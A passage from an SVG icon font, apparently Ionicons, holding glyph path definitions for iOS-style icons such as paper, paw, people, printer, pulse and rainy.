d="M295 214v0c6 -6 9 -13 9 -22c0 -11 -5 -20 -13 -26v0s-51 -38 -106 -78l-38 32c-4 3 -8 3 -10 1v0c-2 -2 -2 -6 1 -10l29 -35l-114 -84c-6 -4 -13 -8 -21 -8c-18 0 -32 14 -32 32c0 7 2 13 5 18v0c1 2 16 25 36 57l20 -17c4 -3 8 -3 10 -1v0c2 2 2 6 -1 10l-20 23
c27 43 60 96 84 134l36 -30c4 -3 8 -3 10 -1v0c2 2 2 6 -1 10l-33 40c11 18 18 29 18 29v0c6 10 16 16 28 16c9 0 18 -4 24 -10v0l78 -79l1 -1v0zM384 309l-103 -59l-28 29l70 121l28 -16l-50 -85l67 38z" />
    <glyph glyph-name="ion-ios-paper-outline" unicode="&#xf471;" horiz-adv-x="384" 
d="M48 384h336v-353c0 -17 -14 -31 -31 -31h-322c-17 0 -31 14 -31 31v305h32v-16h-16v-289c0 -8 7 -15 15 -15h322c8 0 15 7 15 15v337h-304v-320h-16v320v16zM96 320v16h128v-16h-128zM96 240v16h240v-16h-240zM96 160v16h192v-16h-192zM96 80v16h240v-16h-240z" />
    <glyph glyph-name="ion-ios-paper" unicode="&#xf472;" horiz-adv-x="384" 
d="M48 384h336v-353c0 -17 -14 -31 -31 -31h-322c-17 0 -31 14 -31 31v305h32v-288h16v288v32v16zM96 336v-16h128v16h-128zM96 176v-16h192v16h-192zM336 80v16h-240v-16h240zM336 240v16h-240v-16h240z" />
    <glyph glyph-name="ion-ios-paperplane-outline" unicode="&#xf473;" horiz-adv-x="320" 
d="M0 198l320 154l-146 -320l-57 115zM132 152l41 -83l115 249zM286 320l-248 -121l83 -36z" />
    <glyph glyph-name="ion-ios-paperplane" unicode="&#xf474;" horiz-adv-x="320" 
d="M0 198l320 154l-214 -200zM320 352l-146 -320l-52 104z" />
    <glyph glyph-name="ion-ios-partlysunny-outline" unicode="&#xf475;" horiz-adv-x="384" 
d="M144 298v54h16v-54h-16zM0 192v16h55v-16h-55zM44 299l10 11l32 -32l-11 -11zM223 268l-11 11l32 32l11 -11zM56 96l-10 11l31 31l11 -11zM129 153c-4 -3 -8 -7 -12 -12c-23 12 -39 36 -39 63c0 39 32 71 71 71c21 0 40 -10 53 -25c-4 -2 -9 -4 -14 -8
c-10 11 -23 17 -39 17c-30 0 -55 -25 -55 -55c0 -23 15 -43 35 -51zM235 208c-34 0 -63 -28 -63 -62v-12s1 -10 1 -10c-5 0 -12 -1 -14 -1c-19 -3 -33 -18 -33 -37c0 -10 3 -19 10 -26s16 -11 26 -11h157c27 0 49 22 49 49s-22 50 -49 50c-2 0 -4 -1 -6 -1l-14 -2l-3 14
c-3 14 -11 26 -22 35s-25 14 -39 14zM235 224v0c37 0 68 -26 76 -61h8c36 0 65 -29 65 -65s-29 -66 -65 -66h-157c-28 0 -52 24 -52 53c0 27 21 51 47 53v8c0 43 35 78 78 78z" />
    <glyph glyph-name="ion-ios-partlysunny" unicode="&#xf476;" horiz-adv-x="384" 
d="M144 298v54h16v-54h-16zM0 192v16h55v-16h-55zM44 299l10 11l32 -32l-11 -11zM223 268l-11 11l32 32l11 -11zM56 96l-10 11l31 31l11 -11zM235 224v0c37 0 68 -26 76 -61h8c36 0 65 -29 65 -65s-29 -66 -65 -66h-157c-28 0 -52 24 -52 53c0 27 21 51 47 53v8
c0 43 35 78 78 78zM201 252l1 -2v0c-31 -5 -62 -43 -62 -75c0 -2 1 -5 1 -7l-1 -1h-1c-11 -6 -18 -14 -22 -26v1v-1c-23 12 -39 36 -39 63c0 39 32 71 71 71c21 0 39 -9 52 -23z" />
    <glyph glyph-name="ion-ios-pause-outline" unicode="&#xf477;" horiz-adv-x="256" 
d="M63 336h-47v-288h47v288zM79 352v0v-320h-79v320h79zM240 336h-47v-288h47v288zM256 352v0v-320h-79v320h79z" />
    <glyph glyph-name="ion-ios-pause" unicode="&#xf478;" horiz-adv-x="256" 
d="M0 32v320h79v-320h-79zM177 32v320h79v-320h-79z" />
    <glyph glyph-name="ion-ios-paw-outline" unicode="&#xf479;" horiz-adv-x="384" 
d="M380 252c6 -17 5 -38 -3 -57c-10 -25 -31 -43 -51 -43c-5 0 -10 1 -15 3c-22 10 -30 45 -17 79c10 28 31 46 51 46c5 0 10 -1 14 -3c10 -4 17 -13 21 -25zM362 202c6 15 7 31 2 44c-2 5 -5 12 -12 15c-2 1 -4 2 -7 2c-13 0 -28 -15 -36 -36c-9 -25 -6 -50 8 -56
c2 -1 5 -1 8 -1c14 0 29 13 37 32zM90 234c13 -34 5 -69 -17 -79c-5 -2 -10 -3 -15 -3c-20 0 -41 18 -51 43c-8 19 -9 40 -3 57c4 12 11 21 21 25c4 2 9 3 14 3c20 0 41 -18 51 -46zM67 171c14 6 17 31 8 56c-8 21 -23 36 -36 36c-3 0 -5 -1 -7 -2c-7 -3 -10 -10 -12 -15
c-5 -13 -4 -29 2 -44c8 -19 23 -32 37 -32c3 0 6 0 8 1zM134 237c-28 1 -52 32 -56 69c-2 23 4 45 16 60c8 10 19 17 31 18h6c27 -1 46 -29 50 -67c3 -24 -1 -48 -13 -63c-8 -9 -17 -15 -28 -16c-2 0 -4 -1 -6 -1zM107 356c-10 -12 -14 -29 -12 -48c3 -29 21 -53 40 -54h3
c6 1 12 4 17 10c10 12 12 31 10 51c-3 29 -17 52 -35 53h-3c-9 -1 -16 -7 -20 -12zM192 208c64 0 128 -76 128 -149c0 -22 -11 -40 -22 -47c-13 -9 -23 -12 -42 -12c-23 0 -29 8 -40 15c-8 5 -14 10 -24 10s-16 -5 -24 -10c-11 -7 -17 -15 -40 -15c-19 0 -29 3 -42 12
c-11 7 -22 25 -22 47c0 73 64 149 128 149zM290 27c6 4 14 16 14 32c0 30 -14 64 -36 91c-11 13 -23 24 -36 31c-13 8 -27 11 -40 11s-27 -3 -40 -11c-13 -7 -25 -18 -36 -31c-22 -27 -36 -61 -36 -91c0 -16 8 -28 14 -32c11 -7 18 -10 34 -10c14 0 19 4 26 9c2 1 4 3 6 4
c9 6 18 12 32 12s23 -6 32 -12c2 -1 4 -3 6 -4c7 -5 12 -9 26 -9c16 0 23 3 34 10zM244 238c-11 1 -20 7 -28 16c-12 15 -16 39 -13 63c4 38 23 66 50 67h7c12 -1 22 -8 30 -18c12 -15 18 -37 16 -60c-4 -37 -28 -67 -56 -68h-6zM219 315c-2 -20 0 -39 10 -51
c5 -6 11 -9 17 -10h3c19 1 38 25 41 54c2 19 -3 36 -13 48c-4 5 -10 11 -19 12h-4c-18 -1 -32 -24 -35 -53z" />
    <glyph glyph-name="ion-ios-paw" unicode="&#xf47a;" horiz-adv-x="384" 
d="M380 252c6 -17 5 -38 -3 -57c-10 -25 -31 -43 -51 -43c-5 0 -10 1 -15 3c-22 10 -30 45 -17 79c10 28 31 46 51 46c5 0 10 -1 14 -3c10 -4 17 -13 21 -25zM90 234c13 -34 5 -69 -17 -79c-5 -2 -10 -3 -15 -3c-20 0 -41 18 -51 43c-8 19 -9 40 -3 57c4 12 11 21 21 25
c4 2 9 3 14 3c20 0 41 -18 51 -46zM134 237c-28 1 -52 32 -56 69c-2 23 4 45 16 60c8 10 19 17 31 18h6c27 -1 46 -29 50 -67c3 -24 -1 -48 -13 -63c-8 -9 -17 -15 -28 -16c-2 0 -4 -1 -6 -1zM192 208c64 0 128 -76 128 -149c0 -22 -11 -40 -22 -47c-13 -9 -23 -12 -42 -12
c-23 0 -29 8 -40 15c-8 5 -14 10 -24 10s-16 -5 -24 -10c-11 -7 -17 -15 -40 -15c-19 0 -29 3 -42 12c-11 7 -22 25 -22 47c0 73 64 149 128 149zM244 238c-11 1 -20 7 -28 16c-12 15 -16 39 -13 63c4 38 23 66 50 67h7c12 -1 22 -8 30 -18c12 -15 18 -37 16 -60
c-4 -37 -28 -67 -56 -68h-6z" />
    <glyph glyph-name="ion-ios-people-outline" unicode="&#xf47b;" 
d="M224 336v0v0zM317 113c11 -4 -11 4 0 0c28 -10 46 -35 46 -65h-28h-250c0 22 9 42 27 55c15 11 31 12 49 16c7 1 24 5 26 13s1 15 1 23c0 3 0 3 -2 5c-4 4 -6 9 -8 14c-2 8 -3 16 -4 24c-9 -2 -10 16 -12 21c-1 4 -7 24 3 21c-3 5 -4 13 -5 19c-2 13 -2 26 3 39
c10 26 37 39 64 38c26 -1 51 -16 59 -42c4 -12 3 -26 1 -39c-1 -5 -2 -11 -4 -15c10 3 4 -20 3 -23c-2 -5 -3 -21 -12 -19c-1 -10 -2 -22 -7 -31c-1 -2 -7 -8 -7 -10v-11c0 -5 0 -10 2 -15s10 -7 14 -8c14 -5 27 -5 41 -10zM115 84c-6 -6 9 10 0 0c-6 -6 -10 -12 -12 -20h4
h238c-4 15 -17 27 -30 33s-28 4 -41 9s-25 9 -28 25c-2 11 -2 22 -2 33c0 2 7 7 8 9c3 5 4 11 5 17c1 5 0 12 4 15c5 4 7 7 9 13c2 8 3 12 -1 19c-3 5 0 8 1 13c3 11 4 24 2 36c-8 37 -62 45 -86 19c-12 -13 -12 -31 -9 -47c1 -6 6 -14 3 -19c-1 -3 -5 -6 -4 -10
c2 -5 2 -11 4 -16c2 -4 4 -6 7 -8s3 -6 3 -9c1 -7 2 -17 6 -23c3 -4 8 -6 8 -11v-21c-1 -8 -2 -18 -8 -24c-7 -6 -18 -10 -27 -12c-11 -3 -23 -3 -33 -7c-8 -3 -15 -8 -21 -14zM112 126c-15 -7 9 4 0 0c-9 -5 -18 -11 -25 -19c-1 -2 -6 -11 -7 -11h-25h-55c0 20 13 34 31 40
c6 2 27 4 30 11c2 5 0 11 0 16c-10 -1 -24 1 -32 7c-2 2 3 9 4 12l3 12c1 9 1 19 1 28c0 16 -1 34 8 48c8 13 23 18 38 18c24 0 43 -13 47 -37c3 -16 1 -32 2 -48c0 -8 2 -16 5 -24c1 -2 5 -7 3 -9l-6 -3c-5 -2 -11 -3 -17 -4c-1 0 -8 0 -9 -1s0 -9 0 -11c0 -4 1 -6 5 -7
c6 -2 19 -3 23 -8c2 -3 1 -5 -2 -5c-8 -1 -15 -1 -22 -5zM71 112c6 10 16 18 26 24c-9 9 -5 26 -4 37c0 2 0 5 2 5h8c6 0 11 1 17 2c-7 23 0 47 -5 70c-3 16 -15 23 -31 23c-17 0 -27 -9 -30 -25c-4 -22 3 -46 -4 -68c9 -1 17 -2 26 -2c1 0 1 -28 1 -29
c-1 -12 -8 -18 -19 -22c-12 -4 -29 -3 -36 -15h49zM368 96c-2 8 -10 14 -16 19c-8 6 -18 13 -28 15c-3 1 -16 -1 -13 5c2 4 9 5 13 6s15 2 16 7c0 1 1 14 0 14c-6 0 -12 1 -18 2c-4 1 -7 2 -11 4c-6 3 -2 6 0 11c14 32 -10 88 32 105c15 6 34 5 48 -3c15 -9 20 -27 20 -44
c0 -20 -4 -44 7 -62c2 -3 4 -4 0 -6c-2 -1 -4 -1 -6 -2l-12 -3s-9 -1 -13 -1c0 -4 -2 -13 1 -17c6 -7 21 -7 29 -10c18 -6 31 -20 31 -40h-80zM367 123c4 -4 -5 5 0 0s8 -11 15 -11h16h28c-7 12 -26 11 -38 16c-11 4 -16 12 -17 24c0 2 -1 27 1 27c9 0 18 0 26 1
c-7 23 1 47 -4 70c-3 15 -15 23 -30 23c-17 0 -28 -8 -31 -25c-4 -23 2 -46 -5 -68c6 -2 12 -2 18 -2s8 1 9 -5c1 -11 5 -28 -4 -37c6 -4 11 -8 16 -13z" />
    <glyph glyph-name="ion-ios-people" unicode="&#xf47c;" 
d="M317 113c11 -4 -11 4 0 0v0zM317 113c28 -10 46 -35 46 -65h-28h-250c0 22 9 42 27 55c15 11 31 12 49 16c7 1 24 5 26 13s1 15 1 23c0 3 0 3 -2 5c-4 4 -6 9 -8 14c-2 8 -3 16 -4 24c-9 -2 -10 16 -12 21c-1 4 -7 24 3 21c-3 5 -4 13 -5 19c-2 13 -2 26 3 39
c10 26 37 39 64 38c26 -1 51 -16 59 -42c4 -12 3 -26 1 -39c-1 -5 -2 -11 -4 -15c10 3 4 -20 3 -23c-2 -5 -3 -21 -12 -19c-1 -10 -2 -22 -7 -31c-1 -2 -7 -8 -7 -10v-11c0 -5 0 -10 2 -15s10 -7 14 -8c14 -5 27 -5 41 -10zM111 126h2h-1h-1zM111 126c-9 -5 -17 -11 -24 -19
c-1 -2 -6 -11 -7 -11h-25h-55c0 20 12 34 30 40c6 2 27 4 30 11c2 5 1 11 1 16c-10 -1 -24 1 -32 7c-2 2 3 9 4 12c1 4 2 7 3 11c1 9 1 19 1 28c0 16 -1 35 8 49c8 13 23 18 38 18c24 0 43 -13 47 -37c3 -16 1 -32 2 -48c0 -8 2 -16 5 -24c1 -2 5 -7 3 -9l-6 -3
c-5 -2 -11 -3 -17 -4c-1 0 -8 0 -9 -1s0 -9 0 -11c0 -4 1 -6 5 -7c6 -2 19 -3 23 -8c2 -3 1 -5 -2 -5c-7 -1 -14 -2 -21 -5c2 1 2 2 -1 0c-8 -4 -4 -2 -1 0zM417 136c18 -6 31 -20 31 -40h-80c-2 8 -10 14 -16 19c-8 6 -18 13 -28 15c-3 1 -16 -1 -13 5c2 4 9 5 13 6
s15 2 16 7c0 1 1 14 0 14c-6 0 -12 1 -18 2c-4 1 -7 2 -11 4c-6 3 -2 6 0 11c14 32 -10 88 32 105c15 6 34 5 48 -3c15 -9 20 -27 20 -44c0 -20 -4 -44 7 -62c2 -3 4 -4 0 -6c-2 -1 -4 -1 -6 -2l-12 -3s-9 -1 -13 -1c0 -4 -2 -13 1 -17c6 -7 21 -7 29 -10z" />
    <glyph glyph-name="ion-ios-person-outline" unicode="&#xf47d;" horiz-adv-x="320" 
d="M106 246v0v0zM267 84c13 -5 53 -20 53 -52h-160h-160c0 32 40 47 53 52s31 6 43 9c7 2 17 5 20 9s1 41 1 41s-6 10 -9 18s-7 32 -7 32s-7 0 -9 12c-2 13 -6 17 -6 27c0 9 5 10 5 10v0s-4 13 -5 42c-1 34 25 68 74 68s75 -34 74 -68c-1 -29 -5 -42 -5 -42v0s5 -1 5 -10
c0 -10 -3 -15 -6 -28c-2 -12 -9 -12 -9 -12s-4 -23 -7 -31s-9 -18 -9 -18s-2 -37 1 -41s13 -7 20 -9c12 -3 30 -4 43 -9zM160 48v0h137c-2 3 -4 6 -8 8c-7 5 -16 9 -27 13c-7 2 -17 4 -26 5c-6 1 -10 2 -15 3c-3 1 -21 5 -29 15c-4 5 -6 12 -6 32c0 10 1 20 1 20v4l2 4
c1 2 6 9 8 15c2 5 5 19 6 28c0 0 0 -1 1 4s8 4 9 8s3 7 5 18s-5 12 -5 17c0 4 1 5 1 5v0c0 1 4 14 4 38c0 13 -5 26 -14 35c-11 11 -25 16 -44 16c-18 0 -34 -5 -45 -16c-9 -9 -13 -22 -13 -35c1 -24 4 -37 4 -38v0s1 -3 0 -6c-1 -5 -6 -5 -4 -16s4 -14 5 -18s8 -3 9 -8
s1 -4 1 -4c1 -9 4 -23 6 -28c2 -6 6 -13 8 -15l2 -4v-4s1 -10 1 -20c0 -20 -2 -27 -6 -32c-8 -10 -26 -14 -29 -15c-5 -1 -10 -2 -16 -3c-9 -1 -18 -3 -25 -5c-11 -4 -20 -8 -27 -13c-4 -2 -6 -5 -8 -8h137z" />
    <glyph glyph-name="ion-ios-person" unicode="&#xf47e;" horiz-adv-x="320" 
d="M267 84c13 -5 53 -20 53 -52h-160h-160c0 32 40 47 53 52s31 6 43 9c7 2 17 5 20 9s1 41 1 41s-6 10 -9 18s-7 32 -7 32s-7 0 -9 12c-2 13 -6 17 -6 27c0 9 5 10 5 10v0s-4 13 -5 42c-1 34 25 68 74 68s75 -34 74 -68c-1 -29 -5 -42 -5 -42v0s5 -1 5 -10
c0 -10 -3 -15 -6 -28c-2 -12 -9 -12 -9 -12s-4 -23 -7 -31s-9 -18 -9 -18s-2 -37 1 -41s13 -7 20 -9c12 -3 30 -4 43 -9z" />
    <glyph glyph-name="ion-ios-personadd-outline" unicode="&#xf47f;" horiz-adv-x="320" 
d="M320 295v-14h-25v-25h-14v25h-25v14h25v25h14v-25h25zM106 246v0v0zM267 84c13 -5 53 -20 53 -52h-160h-160c0 32 40 47 53 52s31 6 43 9c7 2 17 5 20 9s1 41 1 41s-6 10 -9 18s-7 32 -7 32s-7 0 -9 12c-2 13 -6 17 -6 27c0 9 5 10 5 10v0s-4 13 -5 42c-1 34 25 68 74 68
s75 -34 74 -68c-1 -29 -5 -42 -5 -42v0s5 -1 5 -10c0 -10 -3 -15 -6 -28c-2 -12 -9 -12 -9 -12s-4 -23 -7 -31s-9 -18 -9 -18s-2 -37 1 -41s13 -7 20 -9c12 -3 30 -4 43 -9zM160 48v0h137c-2 3 -4 6 -8 8c-7 5 -16 9 -27 13c-7 2 -17 4 -26 5c-6 1 -10 2 -15 3
c-3 1 -21 5 -29 15c-4 5 -6 12 -6 32c0 10 1 20 1 20v4l2 4c1 2 6 9 8 15c2 5 5 19 6 28c0 0 0 -1 1 4s8 4 9 8s3 7 5 18s-5 12 -5 17c0 4 1 5 1 5v0c0 1 4 14 4 38c0 13 -5 26 -14 35c-11 11 -25 16 -44 16c-18 0 -34 -5 -45 -16c-9 -9 -13 -22 -13 -35c1 -24 4 -37 4 -38
v0s1 -3 0 -6c-1 -5 -6 -5 -4 -16s4 -14 5 -18s8 -3 9 -8s1 -4 1 -4c1 -9 4 -23 6 -28c2 -6 6 -13 8 -15l2 -4v-4s1 -10 1 -20c0 -20 -2 -27 -6 -32c-8 -10 -26 -14 -29 -15c-5 -1 -10 -2 -16 -3c-9 -1 -18 -3 -25 -5c-11 -4 -20 -8 -27 -13c-4 -2 -6 -5 -8 -8h137z" />
    <glyph glyph-name="ion-ios-personadd" unicode="&#xf480;" horiz-adv-x="320" 
d="M320 295v-14h-25v-25h-14v25h-25v14h25v25h14v-25h25zM267 84c13 -5 53 -20 53 -52h-160h-160c0 32 40 47 53 52s31 6 43 9c7 2 17 5 20 9s1 41 1 41s-6 10 -9 18s-7 32 -7 32s-7 0 -9 12c-2 13 -6 17 -6 27c0 9 5 10 5 10v0s-4 13 -5 42c-1 34 25 68 74 68
s75 -34 74 -68c-1 -29 -5 -42 -5 -42v0s5 -1 5 -10c0 -10 -3 -15 -6 -28c-2 -12 -9 -12 -9 -12s-4 -23 -7 -31s-9 -18 -9 -18s-2 -37 1 -41s13 -7 20 -9c12 -3 30 -4 43 -9z" />
    <glyph glyph-name="ion-ios-photos-outline" unicode="&#xf481;" 
d="M64 320h384v-320h-384v320zM432 16v288h-352v-288h352zM0 384h384v-48h-16v32h-352v-288h32v-16h-48v320z" />
    <glyph glyph-name="ion-ios-photos" unicode="&#xf482;" 
d="M64 320h384v-320h-384v320zM384 384v-48h-336v-272h-48v320h384z" />
    <glyph glyph-name="ion-ios-pie-outline" unicode="&#xf483;" 
d="M256 367v0v-207v-12l-12 -4l-180 -45c6 -13 13 -25 21 -36c12 -16 25 -30 41 -42c33 -24 73 -37 114 -37c26 0 51 5 75 15c23 10 43 23 61 41s31 38 41 61c10 24 15 49 15 75c0 51 -20 100 -56 136c-32 32 -75 51 -120 55zM240 384v0c115 0 208 -93 208 -208
s-93 -208 -208 -208c-92 0 -171 60 -198 143l198 49v224zM208 400c-31 -1 -60 -7 -85 -18c-24 -11 -44 -26 -61 -46c-29 -34 -46 -80 -46 -127v0v0c0 -13 3 -46 12 -70l180 46v215zM224 416v0v-244l-205 -52c-19 32 -19 89 -19 89c0 91 58 207 218 207h6z" />
    <glyph glyph-name="ion-ios-pie" unicode="&#xf484;" 
d="M240 384v0c115 0 208 -93 208 -208s-93 -208 -208 -208c-92 0 -171 60 -198 143l198 49v224zM224 416v0v-244l-205 -52c-19 32 -19 89 -19 89c0 91 58 207 218 207h6z" />
    <glyph glyph-name="ion-ios-pint-outline" unicode="&#xf485;" horiz-adv-x="224" 
d="M224 278c0 -98 -32 -101 -32 -181c0 -40 16 -71 16 -99c0 -27 -9 -30 -32 -30h-128c-23 0 -32 2 -32 29c0 28 16 60 16 100c0 80 -32 83 -32 181c0 21 1 89 19 125c4 9 13 13 32 13h122c19 0 28 -4 32 -13c18 -36 19 -104 19 -125zM34 396c-8 -16 -14 -43 -17 -76h190
c-3 33 -9 60 -17 76c-1 2 -1 1 -2 2c-2 1 -6 2 -15 2h-122c-9 0 -13 -1 -15 -2c-1 -1 -1 0 -2 -2zM191 -15c0 1 1 5 1 13c0 11 -4 23 -7 37c-4 18 -9 39 -9 62c0 41 8 64 16 86c8 23 16 46 16 95c0 9 -1 18 -1 26h-190c0 -8 -1 -17 -1 -26c0 -49 8 -72 16 -95
c8 -22 16 -45 16 -86c0 -23 -5 -44 -9 -62c-3 -14 -7 -26 -7 -37c0 -8 1 -12 1 -13c2 -1 7 -1 15 -1h128c8 0 13 0 15 1z" />
    <glyph glyph-name="ion-ios-pint" unicode="&#xf486;" horiz-adv-x="224" 
d="M224 278c0 -98 -32 -101 -32 -181c0 -40 16 -71 16 -99c0 -27 -9 -30 -32 -30h-128c-23 0 -32 2 -32 29c0 28 16 60 16 100c0 80 -32 83 -32 181c0 21 1 89 19 125c4 9 13 13 32 13h122c19 0 28 -4 32 -13c18 -36 19 -104 19 -125zM34 396c-8 -16 -14 -43 -17 -76h190
c-3 33 -9 60 -17 76c-1 2 -1 1 -2 2c-2 1 -6 2 -15 2h-122c-9 0 -13 -1 -15 -2c-1 -1 -1 0 -2 -2z" />
    <glyph glyph-name="ion-ios-play-outline" unicode="&#xf487;" horiz-adv-x="256" 
d="M16 323v-262l210 131zM0 352v0l256 -160l-256 -160v320z" />
    <glyph glyph-name="ion-ios-play" unicode="&#xf488;" horiz-adv-x="256" 
d="M0 352v0l256 -160l-256 -160v320z" />
    <glyph glyph-name="ion-ios-plus-empty" unicode="&#xf489;" horiz-adv-x="256" 
d="M256 183h-120v-119h-17v119h-119v17h119v120h17v-120h120v-17z" />
    <glyph glyph-name="ion-ios-plus-outline" unicode="&#xf48a;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM208 1c105 0 191 86 191 191s-86 191 -191 191s-191 -86 -191 -191s86 -191 191 -191zM216 320v-120h120v-17h-120v-119h-17v119h-119v17h119v120h17z" />
    <glyph glyph-name="ion-ios-plus" unicode="&#xf48b;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM336 183v17h-120v120h-17v-120h-119v-17h119v-119h17v119h120z" />
    <glyph glyph-name="ion-ios-pricetag-outline" unicode="&#xf48c;" horiz-adv-x="416" 
d="M416 416v-160l-256 -288l-160 160l256 288h160zM400 264v136h-136l-240 -272l136 -136zM320 288c-18 0 -32 14 -32 32s14 32 32 32s32 -14 32 -32s-14 -32 -32 -32zM320 336c-9 0 -16 -7 -16 -16s7 -16 16 -16s16 7 16 16s-7 16 -16 16z" />
    <glyph glyph-name="ion-ios-pricetag" unicode="&#xf48d;" horiz-adv-x="416" 
d="M304 320c0 11 5 16 16 16s16 -5 16 -16s-5 -16 -16 -16s-16 5 -16 16zM256 416h160v-160l-256 -288l-160 160zM320 288c9 0 16 4 22 10s10 13 10 22s-4 16 -10 22s-13 10 -22 10s-16 -4 -22 -10s-10 -13 -10 -22s4 -16 10 -22s13 -10 22 -10z" />
    <glyph glyph-name="ion-ios-pricetags-outline" unicode="&#xf48e;" 
d="M416 384h32v-144l-240 -272l-25 24l-23 -24l-160 160l256 288h160v-32zM160 -9l12 12l11 12l217 248v105v16v16h-137l-241 -272zM432 247v121h-16v-112l-221 -253l13 -12zM320 288c-18 0 -32 14 -32 32s14 32 32 32s32 -14 32 -32s-14 -32 -32 -32zM320 336
c-9 0 -16 -7 -16 -16s7 -16 16 -16s16 7 16 16s-7 16 -16 16z" />
    <glyph glyph-name="ion-ios-pricetags" unicode="&#xf48f;" 
d="M432 384h16v-144l-240 -272l-13 13l237 266v137zM256 416h160v-32v-16v-112l-221 -253l-12 -11l-23 -24l-160 160zM320 288c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM304 320c0 11 5 16 16 16s16 -5 16 -16s-5 -16 -16 -16s-16 5 -16 16z" />
    <glyph glyph-name="ion-ios-printer-outline" unicode="&#xf490;" horiz-adv-x="416" 
d="M384 336c18 0 32 -13 32 -31v-159c0 -18 -14 -32 -32 -32h-48v-114h-256v114h-48c-18 0 -32 14 -32 32v159c0 18 14 31 32 31h32v48h288v-48h32zM80 368v-32h256v32h-256zM320 16v192h-224v-192h224zM400 146v159c0 9 -7 15 -16 15v0h-352c-9 0 -16 -6 -16 -15v-159
c0 -9 7 -16 16 -16h48v94h256v-94h48c9 0 16 7 16 16z" />
    <glyph glyph-name="ion-ios-printer" unicode="&#xf491;" horiz-adv-x="416" 
d="M80 0v224h256v-224h-256zM80 -0v224h256v-224h-256zM64 352v32h288v-32h-288zM385 336c18 0 31 -14 31 -31v-158c0 -17 -13 -34 -31 -34h-33v126h-288v-126h-31c-18 0 -33 17 -33 34v158c0 17 15 31 33 31h352z" />
    <glyph glyph-name="ion-ios-pulse-strong" unicode="&#xf492;" horiz-adv-x="480" 
d="M432 175c27 0 48 -20 48 -47s-21 -49 -48 -49c-21 0 -38 13 -45 31h-51c-7 0 -13 4 -15 11l-16 47l-50 -173c-2 -7 -8 -11 -15 -11h-1c-7 0 -14 5 -15 12l-51 308l-45 -182c-2 -7 -9 -12 -16 -12h-112v32h99l61 245c2 7 8 13 16 13s15 -7 16 -14l52 -314l45 155
c2 7 8 11 15 11v0c7 0 13 -4 15 -11l29 -85h38c6 19 25 33 46 33z" />
    <glyph glyph-name="ion-ios-pulse" unicode="&#xf493;" 
d="M416 160c18 0 32 -14 32 -32s-14 -32 -32 -32c-15 0 -27 10 -31 23h-65c-3 0 -7 2 -8 5l-23 72l-57 -198c-1 -3 -4 -6 -8 -6v0c-4 0 -7 3 -8 7l-58 346l-54 -220c-1 -4 -4 -6 -8 -6h-96v16h90l62 251c1 4 4 6 8 6s7 -3 8 -7l58 -349l54 190c1 3 4 5 8 5s7 -2 8 -5l30 -91
h59c3 14 16 25 31 25z" />
    <glyph glyph-name="ion-ios-rainy-outline" unicode="&#xf494;" horiz-adv-x="288" 
d="M220 269c38 0 68 -33 68 -71c0 -29 -19 -56 -45 -66l-55 -80c-2 -2 -5 -4 -8 -4c-5 0 -8 3 -8 8c0 2 1 4 2 6l46 66v0h-35l-31 -44c-2 -2 -4 -4 -7 -4c-5 0 -9 3 -9 8c0 2 1 3 2 5l25 35h-37l-53 -76c-2 -2 -4 -4 -7 -4c-5 0 -9 3 -9 8c0 2 2 4 3 6l46 66h-36l-32 -44
c-2 -2 -4 -4 -7 -4c-5 0 -8 3 -8 8c0 2 1 4 2 6l25 34c-29 2 -52 27 -52 56c0 28 22 58 50 60c0 3 -1 5 -1 8c0 46 31 84 82 84c45 0 73 -31 81 -68c3 0 5 1 8 1zM220 146c28 0 52 24 52 52s-24 54 -52 54h-6l-15 -2l-3 15c-3 14 -11 31 -23 40c-12 10 -26 14 -41 14
c-36 0 -66 -31 -66 -67v-12v-10c-6 0 -12 -2 -14 -2c-20 -3 -35 -23 -35 -43c0 -10 4 -20 11 -27s16 -12 26 -12h124v0v0h42z" />
    <glyph glyph-name="ion-ios-rainy" unicode="&#xf495;" horiz-adv-x="288" 
d="M220 269c38 0 68 -33 68 -71c0 -29 -19 -56 -45 -66l-55 -80c-2 -2 -5 -4 -8 -4c-5 0 -8 3 -8 8c0 2 1 4 2 6l46 66v0h-35l-31 -44c-2 -2 -4 -4 -7 -4c-5 0 -9 3 -9 8c0 2 1 3 2 5l25 35h-37l-53 -76c-2 -2 -4 -4 -7 -4c-5 0 -9 3 -9 8c0 2 2 4 3 6l46 66h-36l-32 -44
c-2 -2 -4 -4 -7 -4c-5 0 -8 3 -8 8c0 2 1 4 2 6l25 34c-29 2 -52 27 -52 56c0 28 22 58 50 60c0 3 -1 5 -1 8c0 46 31 84 82 84c45 0 73 -31 81 -68c3 0 5 1 8 1z" />
    <glyph glyph-name="ion-ios-recording-outline" unicode="&#xf496;" horiz-adv-x="480" 
d="M370 304c61 0 110 -50 110 -112s-49 -112 -110 -112h-260c-61 0 -110 50 -110 112s49 112 110 112s110 -50 110 -112c0 -40 -21 -75 -53 -95h146c-32 20 -53 55 -53 95c0 62 49 112 110 112zM16 192c0 -53 42 -95 94 -95s93 42 93 95s-41 95 -93 95s-94 -42 -94 -95z
M370 97c52 0 94 42 94 95s-42 95 -94 95s-93 -42 -93 -95s41 -95 93 -95zM368 240c-26 0 -48 -22 -48 -48s22 -48 48 -48s48 22 48 48s-22 48 -48 48zM368 256v0c35 0 64 -29 64 -64s-29 -64 -64 -64s-64 29 -64 64s29 64 64 64zM112 240c-26 0 -48 -22 -48 -48
s22 -48 48 -48s48 22 48 48s-22 48 -48 48zM112 256v0c35 0 64 -29 64 -64s-29 -64 -64 -64s-64 29 -64 64s29 64 64 64z" />
    <glyph glyph-name="ion-ios-recording" unicode="&#xf497;" horiz-adv-x="480" 
d="M370 304c61 0 110 -50 110 -112s-49 -112 -110 -112h-260c-61 0 -110 50 -110 112s49 112 110 112s110 -50 110 -112c0 -40 -21 -76 -53 -95h146c-32 19 -53 55 -53 95c0 62 49 112 110 112zM112 128c35 0 64 29 64 64s-29 64 -64 64s-64 -29 -64 -64s29 -64 64 -64z
M368 128c35 0 64 29 64 64s-29 64 -64 64s-64 -29 -64 -64s29 -64 64 -64zM368 240c26 0 48 -22 48 -48s-22 -48 -48 -48s-48 22 -48 48s22 48 48 48zM112 240c26 0 48 -22 48 -48s-22 -48 -48 -48s-48 22 -48 48s22 48 48 48z" />
